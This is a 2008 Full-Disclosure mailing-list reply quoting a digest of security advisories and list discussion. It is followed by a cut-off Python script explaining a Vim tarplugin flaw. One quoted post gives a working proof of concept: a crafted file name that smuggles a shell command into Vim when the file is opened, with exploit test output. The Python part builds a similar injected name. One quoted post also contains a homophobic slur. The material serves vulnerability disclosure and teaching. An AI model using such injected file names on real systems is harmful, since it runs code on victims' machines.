Re: [Full-disclosure] Full-Disclosure Digest, Vol 41, Issue 3
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Full-Disclosure Digest, Vol 41, Issue 3
- From: badr muhyeddin <gigiyousef@xxxxxxxxxxx>
- Date: Wed, 2 Jul 2008 14:15:35 +0300
> From: full-disclosure-request@xxxxxxxxxxxxxxxxx
> Subject: Full-Disclosure Digest, Vol 41, Issue 3
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Date: Wed, 2 Jul 2008 12:00:01 +0100
>
> Send Full-Disclosure mailing list submissions to
>     full-disclosure@xxxxxxxxxxxxxxxxx
>
> To subscribe or unsubscribe via the World Wide Web, visit
>     https://lists.grok.org.uk/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
>     full-disclosure-request@xxxxxxxxxxxxxxxxx
>
> You can reach the person managing the list at
>     full-disclosure-owner@xxxxxxxxxxxxxxxxx
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
>
>
> Note to digest recipients - when replying to digest posts, please trim
> your post appropriately. Thank you.
>
>
> Today's Topics:
>
>    1. [ GLSA 200807-01 ] Python: Multiple integer overflows
>       (Tobias Heinlein)
>    2. [ GLSA 200807-02 ] Motion: Execution of arbitrary code
>       (Tobias Heinlein)
>    3. Alphanumeric shellcode improvements (Berend-Jan Wever)
>    4. Re: [SCANIT-2008-001] QNX phgrafx Privilege Escalation
>       Vulnerability (mrdkaaa@xxxxxxxxx)
>    5. Re: Collection of Vulnerabilities in Fully Patched Vim 7.1
>       ( Jan Minář )
>    6. [SECURITY] [DSA 1560-1] New sympa packages fix denial of
>       service (Steve Kemp)
>    7. [tool] ratproxy - passive web application security assessment
>       tool (Michal Zalewski)
>    8. Re: [SCANIT-2008-001] QNX phgrafx Privilege Escalation
>       Vulnerability (Filipe Balestra)
>    9. Re: Full-Disclosure? introducing lul-disclosure.
>       (Tonnerre Lombard)
>   10. Deepsec Talks 2007 are online - registration for 2008 is open
>       (DeepSec 2008)
>   11. Re: Full-Disclosure? introducing lul-disclosure. (root)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Tue, 01 Jul 2008 13:51:43 +0200
> From: Tobias Heinlein <keytoaster@xxxxxxxxxx>
> Subject: [Full-disclosure] [ GLSA 200807-01 ] Python: Multiple integer
>     overflows
> To: gentoo-announce@xxxxxxxxxx
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx,
>     security-alerts@xxxxxxxxxxxxxxxxx
> Message-ID: <486A1A4F.1080404@xxxxxxxxxx>
> Content-Type: text/plain; charset="utf-8"
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>                    Gentoo Linux Security Advisory            GLSA 200807-01
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>                              http://security.gentoo.org/
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
>   Severity: Normal
>      Title: Python: Multiple integer overflows
>       Date: July 01, 2008
>       Bugs: #216673, #217221
>         ID: 200807-01
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Synopsis
> ========
>
> Multiple integer overflows may allow for Denial of Service.
>
> Background
> ==========
>
> Python is an interpreted, interactive, object-oriented programming
> language.
>
> Affected packages
> =================
>
>     -------------------------------------------------------------------
>      Package              /  Vulnerable  /              Unaffected
>     -------------------------------------------------------------------
>   1  dev-lang/python       < 2.4.4-r13            *>= 2.3.6-r6
>                                                    >= 2.4.4-r13
>
> Description
> ===========
>
> Multiple vulnerabilities were discovered in Python:
>
> * David Remahl reported multiple integer overflows in the file
>   imageop.c, leading to a heap-based buffer overflow (CVE-2008-1679).
>   This issue is due to an incomplete fix for CVE-2007-4965.
>
> * Justin Ferguson discovered that an integer signedness error in the
>   zlib extension module might trigger insufficient memory allocation
>   and a buffer overflow via a negative signed integer (CVE-2008-1721).
>
> * Justin Ferguson discovered that insufficient input validation in
>   the PyString_FromStringAndSize() function might lead to a buffer
>   overflow (CVE-2008-1887).
>
> Impact
> ======
>
> A remote attacker could exploit these vulnerabilities to cause a Denial
> of Service or possibly the remote execution of arbitrary code with the
> privileges of the user running Python.
>
> Workaround
> ==========
>
> There is no known workaround at this time.
>
> Resolution
> ==========
>
> The imageop module is no longer built in the unaffected versions.
>
> All Python 2.3 users should upgrade to the latest version:
>
>     # emerge --sync
>     # emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r6"
>
> All Python 2.4 users should upgrade to the latest version:
>
>     # emerge --sync
>     # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r13"
>
> References
> ==========
>
>   [ 1 ] CVE-2008-1679
>         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1679
>   [ 2 ] CVE-2008-1721
>         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721
>   [ 3 ] CVE-2008-1887
>         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887
>
> Availability
> ============
>
> This GLSA and any updates to it are available for viewing at
> the Gentoo Security Website:
>
>   http://security.gentoo.org/glsa/glsa-200807-01.xml
>
> Concerns?
> =========
>
> Security is a primary focus of Gentoo Linux and ensuring the
> confidentiality and security of our users' machines is of utmost
> importance to us. Any security concerns should be addressed to
> security@xxxxxxxxxx or alternatively, you may file a bug at
> http://bugs.gentoo.org.
>
> License
> =======
>
> Copyright 2008 Gentoo Foundation, Inc; referenced text
> belongs to its owner(s).
>
> The contents of this document are licensed under the
> Creative Commons - Attribution / Share Alike license.
>
> http://creativecommons.org/licenses/by-sa/2.5
>
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 197 bytes
> Desc: OpenPGP digital signature
> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/26592a7c/attachment-0001.bin
>
> ------------------------------
>
> Message: 2
> Date: Tue, 01 Jul 2008 13:59:36 +0200
> From: Tobias Heinlein <keytoaster@xxxxxxxxxx>
> Subject: [Full-disclosure] [ GLSA 200807-02 ] Motion: Execution of
>     arbitrary code
> To: gentoo-announce@xxxxxxxxxx
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx,
>     security-alerts@xxxxxxxxxxxxxxxxx
> Message-ID: <486A1C28.3010409@xxxxxxxxxx>
> Content-Type: text/plain; charset="utf-8"
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>                    Gentoo Linux Security Advisory            GLSA 200807-02
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>                              http://security.gentoo.org/
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
>   Severity: Normal
>      Title: Motion: Execution of arbitrary code
>       Date: July 01, 2008
>       Bugs: #227053
>         ID: 200807-02
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Synopsis
> ========
>
> Multiple vulnerabilities in Motion might result in the execution of
> arbitrary code.
>
> Background
> ==========
>
> Motion is a program that monitors the video signal from one or more
> cameras and is able to detect motions.
>
> Affected packages
> =================
>
>     -------------------------------------------------------------------
>      Package              /  Vulnerable  /              Unaffected
>     -------------------------------------------------------------------
>   1  media-video/motion    < 3.2.10.1              >= 3.2.10.1
>
> Description
> ===========
>
> Nico Golde reported an off-by-one error within the read_client()
> function in the webhttpd.c file, leading to a stack-based buffer
> overflow. Stefan Cornelius (Secunia Research) reported a boundary error
> within the same function, also leading to a stack-based buffer
> overflow. Both vulnerabilities require that the HTTP Control interface
> is enabled.
>
> Impact
> ======
>
> A remote attacker could exploit these vulnerabilities by sending an
> overly long or specially crafted request to a vulnerable Motion HTTP
> control interface, possibly resulting in the execution of arbitrary
> code with the privileges of the motion user.
>
> Workaround
> ==========
>
> There is no known workaround at this time.
>
> Resolution
> ==========
>
> All Motion users should upgrade to the latest version:
>
>     # emerge --sync
>     # emerge --ask --oneshot --verbose ">=media-video/motion-3.2.10.1"
>
> References
> ==========
>
>   [ 1 ] CVE-2008-2654
>         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2654
>
> Availability
> ============
>
> This GLSA and any updates to it are available for viewing at
> the Gentoo Security Website:
>
>   http://security.gentoo.org/glsa/glsa-200807-02.xml
>
> Concerns?
> =========
>
> Security is a primary focus of Gentoo Linux and ensuring the
> confidentiality and security of our users' machines is of utmost
> importance to us. Any security concerns should be addressed to
> security@xxxxxxxxxx or alternatively, you may file a bug at
> http://bugs.gentoo.org.
>
> License
> =======
>
> Copyright 2008 Gentoo Foundation, Inc; referenced text
> belongs to its owner(s).
>
> The contents of this document are licensed under the
> Creative Commons - Attribution / Share Alike license.
>
> http://creativecommons.org/licenses/by-sa/2.5
>
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 197 bytes
> Desc: OpenPGP digital signature
> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/b9cded25/attachment-0001.bin
>
> ------------------------------
>
> Message: 3
> Date: Tue, 1 Jul 2008 14:18:34 +0200
> From: "Berend-Jan Wever" <berendjanwever@xxxxxxxxx>
> Subject: [Full-disclosure] Alphanumeric shellcode improvements
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
>     <3fa2f5bb0807010518g1316eb13habc42e109ee1b7d9@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi all,
>
> I've not had as much opportunity in the last three years to contribute, but
> I do have some new stuff: I've decided to pre-release some parts of ALPHA3,
> the upcoming new version of my alphanumeric shellcode encoder:
> * I've reduced the size of the mixedcase ascii decoder:
> http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x86
> * I've created a lowercase ascii decoder:
> http://skypher.com/wiki/index.php?title=Lowercase_ASCII_alphanumeric_code_decoder_for_x86
> * I've created a mixedcase ascii decoder for x64:
> http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x64
> See http://skypher.com/wiki/index.php?title=ALPHA3 for a complete list and
> some documentation.
>
> Cheers,
> SkyLined
>
> --
> Berend-Jan "SkyLined" Wever
> Email & Live messenger: berendjanwever@xxxxxxxxx
> --
> 'The historical abuses of new data occurred between the time that a few
> people learned the important thing and the time when that important thing
> became general knowledge. To the Gowachin and to BuSab it was the "Data
> Gap," a source of constant danger.'
> -- Frank Herbert, 'The Dosadi Experiment'
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/adf69bc9/attachment-0001.html
>
> ------------------------------
>
> Message: 4
> Date: Tue, 01 Jul 2008 16:39:54 +0200 (CEST)
> From: mrdkaaa@xxxxxxxxx
> Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege
>     Escalation Vulnerability
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID: <4.4-28953-1047754371-1214923194@xxxxxxxxx>
> Content-Type: text/plain; charset="us-ascii"
>
> This vulnerability is at least two years old. Anyway, what's the point of releasing
> a security advisory for a vendor that is well known never to patch it?
>
>
>
> ------------------------------
>
> Message: 5
> Date: Tue, 1 Jul 2008 20:36:29 +0100
> From: "Jan Minář" <rdancer@xxxxxxxxxxx>
> Subject: Re: [Full-disclosure] Collection of Vulnerabilities in Fully
>     Patched Vim 7.1
> To: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx,
>     vim_dev@xxxxxxxxxxxxxxxx, "Bram Moolenaar" <Bram@xxxxxxxxxxxxx>
> Cc: bugs@xxxxxxx
> Message-ID:
>     <6edf76c20807011236t7f96955h924c2692705b6ff4@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset=UTF-8
>
> On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram@xxxxxxxxxxxxx> wrote:
> >
> > Jan Minar wrote:
> >
> >> 1. Summary
> >>
> >> Product  : Vim -- Vi IMproved
> >> Version  : Tested with 7.1.314 and 6.4
> >> Impact   : Arbitrary code execution
> >> Wherefrom: Local and remote
> >> Original : http://www.rdancer.org/vulnerablevim.html
> >>
> >> Improper quoting in some parts of Vim written in the Vim Script can lead to
> >> arbitrary code execution upon opening a crafted file.
>
> > Note that version 7.1.314, as reported in the Summary, does not have
> > most of the reported problems. The problems in the plugins have also
> > been fixed, this requires updating the runtime files. Information about
> > that can be found at http://www.vim.org/runtime.php
>
> I do apologize: as written in the advisory, the version I worked with
> was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have
> updated the advisory at http://www.rdancer.org/vulnerablevim.html .
>
> Thanks to Bram for all the good work.
>
> 7.2a.10 with updated runtime is still vulnerable to the zipplugin
> attack, and an updated tarplugin attack:
>
> -------------------------------------------
> -------- Test results below ---------------
> -------------------------------------------
> filetype.vim
>   strong          : EXPLOIT FAILED
>   weak            : EXPLOIT FAILED
> tarplugin         : EXPLOIT FAILED
> tarplugin.updated : VULNERABLE
> zipplugin         : VULNERABLE
> xpm.vim
>   xpm             : EXPLOIT FAILED
>   xpm2            : EXPLOIT FAILED
> remote            : EXPLOIT FAILED
> gzip_vim          : EXPLOIT FAILED
> netrw             : EXPLOIT FAILED
>
> The original tarplugin exploit now produces a string of telling error messages:
>
> /bin/bash: so%: command not found
> tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo: Cannot open: No such file or directory
> tar: Error is not recoverable: exiting now
> /bin/bash: retu: command not found
> /bin/bash: bar.tar|retu|'bar.tar: command not found
>
> It's easy to see that it is still possible to execute arbitrary shell commands.
>
> $VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:
>
>    136    if tarfile =~# '\.\(gz\|tgz\)$'
>    137 "   call Decho("1: exe silent r! gzip -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
>   *138     exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
>    139    elseif tarfile =~# '\.lrp'
>    140 "   call Decho("2: exe silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - ")
>   *141     exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - "
>    142    elseif tarfile =~# '\.bz2$'
>    143 "   call Decho("3: exe silent r! bzip2 -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
>   *144     exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
>    145    else
>    146 "   call Decho("4: exe silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile))
>  **147     exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)
>    [...]
>    444 fun s:Escape(name)
>    445   " shellescape() was added by patch 7.0.111
>    446   if exists("*shellescape")
>    447    let qnameq= shellescape(a:name)
>    448   else
>    449    let qnameq= g:tar_shq . a:name . g:tar_shq
>    450   endif
>    451   return qnameq
>    452 endfun
>
> (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.
>
> (**) tar(1) allows arbitrary command execution via options ``--to-command'',
> and ``--use-compress-program''.
>
>
> The updated tarplugin attack is rather simple:
>
> $ rm -rf ./*
> $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 | xxd -r\`;'bar.tar"
> $ vim +:q ./foo*
> $ ls -l pwned
> -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned
>
> Cheers,
> Jan Minar.
>
>
>
> ------------------------------
>
> Message: 6
> Date: Tue, 1 Jul 2008 21:25:39 +0100
> From: Steve Kemp <skx@xxxxxxxxxx>
> Subject: [Full-disclosure] [SECURITY] [DSA 1560-1] New sympa packages
>     fix denial of service
> To: debian-security-announce@xxxxxxxxxxxxxxxx
> Message-ID: <20080701202539.GA32605@xxxxxxxxxxxx>
> Content-Type: text/plain; charset=us-ascii
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> - ------------------------------------------------------------------------
> Debian Security Advisory DSA-1600-1                  security@xxxxxxxxxx
> http://www.debian.org/security/                               Steve Kemp
> July 01, 2008                         http://www.debian.org/security/faq
> - ------------------------------------------------------------------------
>
> Package        : sympa
> Vulnerability  : dos
> Problem type   : remote
> Debian-specific: no
> CVE Id(s)      : CVE-2008-1648
> Debian Bug     : 475163
>
> It was discovered that sympa, a modern mailing list manager, would
> crash when processing certain types of malformed messages.
>
> For the stable distribution (etch), this problem has been fixed in version
> 5.2.3-1.2+etch1.
>
> For the unstable distribution (sid), this problem has been fixed in
> version 5.3.4-4.
>
> We recommend that you upgrade your sympa package.
>
>
> Upgrade instructions
> - --------------------
>
> wget url
>         will fetch the file for you
> dpkg -i file.deb
>         will install the referenced file.
>
> If you are using the apt-get package manager, use the line for
> sources.list as given below:
>
> apt-get update
>         will update the internal database
> apt-get upgrade
>         will install corrected packages
>
> You may use an automated update by adding the resources from the
> footer to the proper configuration.
>
>
> Debian GNU/Linux 4.0 alias etch
> - -------------------------------
>
> Source archives:
>
>   http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1.dsc
>     Size/MD5 checksum:      625 c7e720e56b1c4e9778cea822ed150a19
>   http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1.diff.gz
>     Size/MD5 checksum:    96804 a93d8ec3dcbc0a0aed99e513c5749c0e
>   http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3.orig.tar.gz
>     Size/MD5 checksum:  5102528 355cb9174841205831191c93a83da895
>
> alpha architecture (DEC Alpha)
>
>   http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_alpha.deb
>     Size/MD5 checksum:  3589148 26b92215ed7b17531c3702ff76b30901
>
> amd64 architecture (AMD x86_64 (AMD64))
>
>   http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_amd64.deb
>     Size/MD5 checksum:  3591854 531781d522ad5f02e6c5b658883ed37d
>
> arm architecture (ARM)
>
>   http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_arm.deb
>     Size/MD5 checksum:  3590606 dc3437760b7db4761f90e992e3638c52
>
> hppa architecture (HP PA RISC)
>
>   http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_hppa.deb
>     Size/MD5 checksum:  3591482 5601933860831577cb017cb0aa3b31fe
>
> i386 architecture (Intel ia32)
>
>   http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_i386.deb
>     Size/MD5 checksum:  3567454 0c6e3d6046f7d0e9920ed7ce9780b103
>
> ia64 architecture (Intel ia64)
>
>   http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_ia64.deb
>     Size/MD5 checksum:  3571256 c294184494968264ff0857fc2b907711
>
> mips architecture (MIPS (Big Endian))
>
>   http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_mips.deb
>     Size/MD5 checksum:  3584362 1b3371fe22966b198a3c338167e71909
>
> powerpc architecture (PowerPC)
>
>   http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_powerpc.deb
>     Size/MD5 checksum:  3568314 57c566c13cd31f66bbe3652b4c9ea3e7
>
> s390 architecture (IBM S/390)
>
>   http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_s390.deb
>     Size/MD5 checksum:  3568574 afab57a71590dcdd685746b6500040b0
>
> sparc architecture (Sun SPARC/UltraSPARC)
>
>   http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_sparc.deb
>     Size/MD5 checksum:  3568016 0bf312e31bb5df28404ea40842845caf
>
>
>   These files will probably be moved into the stable distribution on
>   its next update.
>
> - ---------------------------------------------------------------------------------
> For apt-get: deb http://security.debian.org/ stable/updates main
> For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
> Mailing list: debian-security-announce@xxxxxxxxxxxxxxxx
> Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
>
> iD8DBQFIapKKwM/Gs81MDZ0RAqAtAJ4qQlnuRralKZTMQhtDqYvMXfaqdQCgof4S
> 6REh7OX9zxqgWYGHqQWtEpQ=
> =ANTa
> -----END PGP SIGNATURE-----
>
>
>
> ------------------------------
>
> Message: 7
> Date: Wed, 2 Jul 2008 02:02:02 +0200 (CEST)
> From: Michal Zalewski <lcamtuf@xxxxxxxx>
> Subject: [Full-disclosure] [tool] ratproxy - passive web application
>     security assessment tool
> To: bugtraq@xxxxxxxxxxxxxxxxx, websecurity@xxxxxxxxxxxxx
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID: <Pine.LNX.4.64.0807012124130.17434@xxxxxxxx>
> Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
>
> Hi all,
>
> I am happy to announce that we've just open sourced ratproxy - a free,
> passive web security assessment tool. This utility is designed to
> transparently analyze legitimate, browser-driven interactions with tested
> web applications - and automatically pinpoint, annotate, and prioritize
> potential flaws or areas of concern on the fly.
>
> The proxy analyzes problems such as cross-site script inclusion threats,
> insufficient cross-site request forgery defenses, caching issues,
> potentially unsafe cross-domain code inclusion schemes and information
> leakage scenarios, and much more.
>
> For a detailed discussion of the utility, please visit:
> http://code.google.com/p/ratproxy/wiki/RatproxyDoc
>
> Source code is available at:
> http://code.google.com/p/ratproxy/downloads/list
>
> And finally, a screenshot of a sample report can be found here:
> http://lcamtuf.coredump.cx/ratproxy-screen.png
>
> The tool should run on Linux, *BSD, MacOS X, and Windows (Cygwin). Since
> it is in beta, there might be some kinks to be ironed out, and not all web
> technologies might be properly accounted for. Feedback is appreciated.
>
> Please keep in mind that the proxy is meant to highlight interesting
> patterns in web applications; a further analysis by a security
> professional is required to interpret the significance of results for a
> particular platform.
>
> Cheers,
> /mz
>
>
>
> ------------------------------
>
> Message: 8
> Date: Wed, 2 Jul 2008 02:19:01 -0300
> From: "Filipe Balestra" <filipe@xxxxxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege
>     Escalation Vulnerability
> To: <full-disclosure@xxxxxxxxxxxxxxxxx>
> Message-ID: <BEDD65A8CCD54B3BAA75664A0D440A93@123PC>
> Content-Type: text/plain; charset="iso-8859-1"
>
> mrdkaaa,
>
> are you saying that this vulnerability is not new to the public?
>
> The program phgrafx had some vulnerabilities published, but this one is not the same as any other that I can find in securityfocus. One program can have a lot of vulnerabilities :)
>
> But yes, this vulnerability is at least four years old, but was not public.
>
> Anyway, QNX released Service Packs to solve some security problems in the past, and it's not our problem, we are advising the customers, they can choose or not the company. If you are a customer you probably would like to know about security issues in all products that you use. Also, we agree it's a crap vuln, that's why we took too long to release it. Whatever, why hold it?
>
> p.s.: Rodrigo and I are no longer working for Scanit, so it's just a personal opinion, not a company official position. If you want to know about the company vulnerability release process or any other information, please, contact the Scanit R&D team.
>
> Cheers,
>
> Filipe Alcarde Balestra
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/cd6c973d/attachment-0001.html
>
> ------------------------------
>
> Message: 9
> Date: Wed, 2 Jul 2008 08:29:43 +0200
> From: Tonnerre Lombard <tonnerre.lombard@xxxxxxxxxx>
> Subject: Re: [Full-disclosure] Full-Disclosure? introducing
>     lul-disclosure.
> To: staff@xxxxxxxxxxxxxxxxxx
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID: <20080702082943.2811aba5@xxxxxxxxxxxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Salut,
>
> On Mon, 30 Jun 2008 21:57:29 -0400, staff wrote:
> > Are you ready for a site that isn't full of fagottry? Where Gadi cant
> > steal your money or eat your lunches? Where you can freely submit
> > lulz to be published? Where Theo's defeat and denial are brought to
> > light? Wait no more!
>
> You mean a site which evidently cannot tell the difference between
> local and remote root vulnerabilities? (The local root exploit for
> obsd4 which is published on that site contains a patch to increment the
> count of _remote_ vulnerabilities on the obsd web site.)
>
> Tonnerre
> --
> SyGroup GmbH
> Tonnerre Lombard
>
> Solutions Systematiques
> Tel:+41 61 333 80 33        Güterstrasse 86
> Fax:+41 61 383 14 67        4053 Basel
> Web:www.sygroup.ch          tonnerre.lombard@xxxxxxxxxx
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 835 bytes
> Desc: not available
> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/0174b22f/attachment-0001.bin
>
> ------------------------------
>
> Message: 10
> Date: Tue, 01 Jul 2008 21:47:36 +0200
> From: DeepSec 2008 <deepsec@xxxxxxxxxxx>
> Subject: [Full-disclosure] Deepsec Talks 2007 are online -
>     registration for 2008 is open
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID: <486A89D8.2000303@xxxxxxxxxxx>
> Content-Type: text/plain; charset=UTF-8; format=flowed
>
> Dear Madam, dear Sir,
>
> DeepSec Vienna, the annual In-Depth Security Conference has opened
> online registrations for 2008. Registrations will receive a discount
> of 5% off the regular fees until August 31st if you use the following
> promotional code: earlybird-L4KZIEUE on our online registration form
> at https://deepsec.net/register/
>
> Videos from 2007 are online:
>
> Also we are happy to announce that talks from last year's conference
> are online. Listen to last year's talks in full length at:
> http://video.google.com/videosearch?q=deepsec&sitesearch=#
>
> Call for Papers still Open for two weeks:
>
> If you have some good ideas for a Talk at the conference and haven't
> decided yet to submit we encourage you to do so now. We still accept
> submissions at https://deepsec.net/cfp/ or via e-mail to:
> cfp@xxxxxxxxxxx
>
>
> We hope to hear from you and of course to meet in Vienna in November!
>
> Best Regards,
>
> Paul Böhm,
> René Pfeiffer,
> Michael Kafka
> DeepSec GmbH
>
>
> --
> DeepSec In-Depth Security Conference
> November 11th to 14th 2008, Vienna, Austria
> https://deepsec.net/
>
>
>
> ------------------------------
>
> Message: 11
> Date: Wed, 02 Jul 2008 04:08:38 -0300
> From: root <root_@xxxxxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] Full-Disclosure? introducing
>     lul-disclosure.
> To: staff@xxxxxxxxxxxxxxxxxx
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID: <486B2976.8000708@xxxxxxxxxxxxxxx>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> You couldn't do the remote exploit even with a google video documenting
> it step by step.
> More like fail-disclosure.
>
> staff wrote:
> > Are you ready for a site that isn't full of fagottry? Where Gadi cant steal
> > your money or eat your lunches? Where you can freely submit lulz to be
> > published? Where Theo's defeat and denial are brought to light? Wait no
> > more!
> >
> > http://lul-disclosure.net/
> >
> > WhiteHat? BlackHat? We are lulzhat.
> > Fuck you and your hats.
> >
> >
> >
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> ------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> End of Full-Disclosure Digest, Vol 41, Issue 3
> **********************************************

unsubscribe
_________________________________________________________________
Invite your mail contacts to join your friends list with Windows Live Spaces.
It's easy!
http://spaces.live.com/spacesapi.aspx?wx_action=create&wx_url=/friends.aspx&mkt=en-us
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
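The tarplugin problem Jan Minář demonstrates in message 5 of the quoted digest comes from two interpreters processing the same command line: `:r!` first expands `%` (and friends) to the current file name, and only then hands the result to the shell, while s:Escape() quotes for the shell alone. The script below is an added illustration of that two-layer failure; it is not code from the digest or from tar.vim. Its assumptions: `vim_shellescape()` and `vim_expand_bang()` are simplified models of Vim's shellescape() (with and without the {special} argument that current Vim documents) and of the `%` handling in `:!` (only `%` is expanded; a backslash before `%`, `#` or `!` is dropped and the character kept literally; `#`, `<cword>` and `:p`-style modifiers are not modelled); `echo` stands in for `tar -tvf` so no archive is needed; the file name is constructed for the demo with a harmless payload in place of the digest's eval/xxd one; and a POSIX `sh` must be on the PATH.

```python
import subprocess

# Constructed file name for the demo (the digest's exploit uses an eval/xxd
# payload that writes a file; here the payload is a harmless 'echo INJECTED').
# '%' is what Vim's :! expands to the current file name, and the single quote
# closes the shell quoting once the expanded name is spliced in unquoted.
EVIL_NAME = "foo%;echo INJECTED;'bar.tar"


def vim_shellescape(name, special=False):
    """Simplified model of Vim's shellescape({string} [, {special}]) on Unix:
    wrap in single quotes and turn every embedded ' into '\\''.  With
    special=True the items :! expands (%, #, !) are additionally preceded by
    a backslash.  s:Escape() in the quoted tar.vim calls shellescape()
    without {special}, i.e. the special=False form."""
    quoted = "'" + name.replace("'", "'\\''") + "'"
    if special:
        for ch in "%#!":
            quoted = quoted.replace(ch, "\\" + ch)
    return quoted


def vim_expand_bang(cmdline, curfile):
    """Simplified model of what :! does to its command line before the shell
    sees it: an unescaped '%' is replaced by the current file name with no
    quoting added, and a backslash before '%', '#' or '!' is removed so the
    character stays literal.  Assumption for the demo: '#', '<cword>' and
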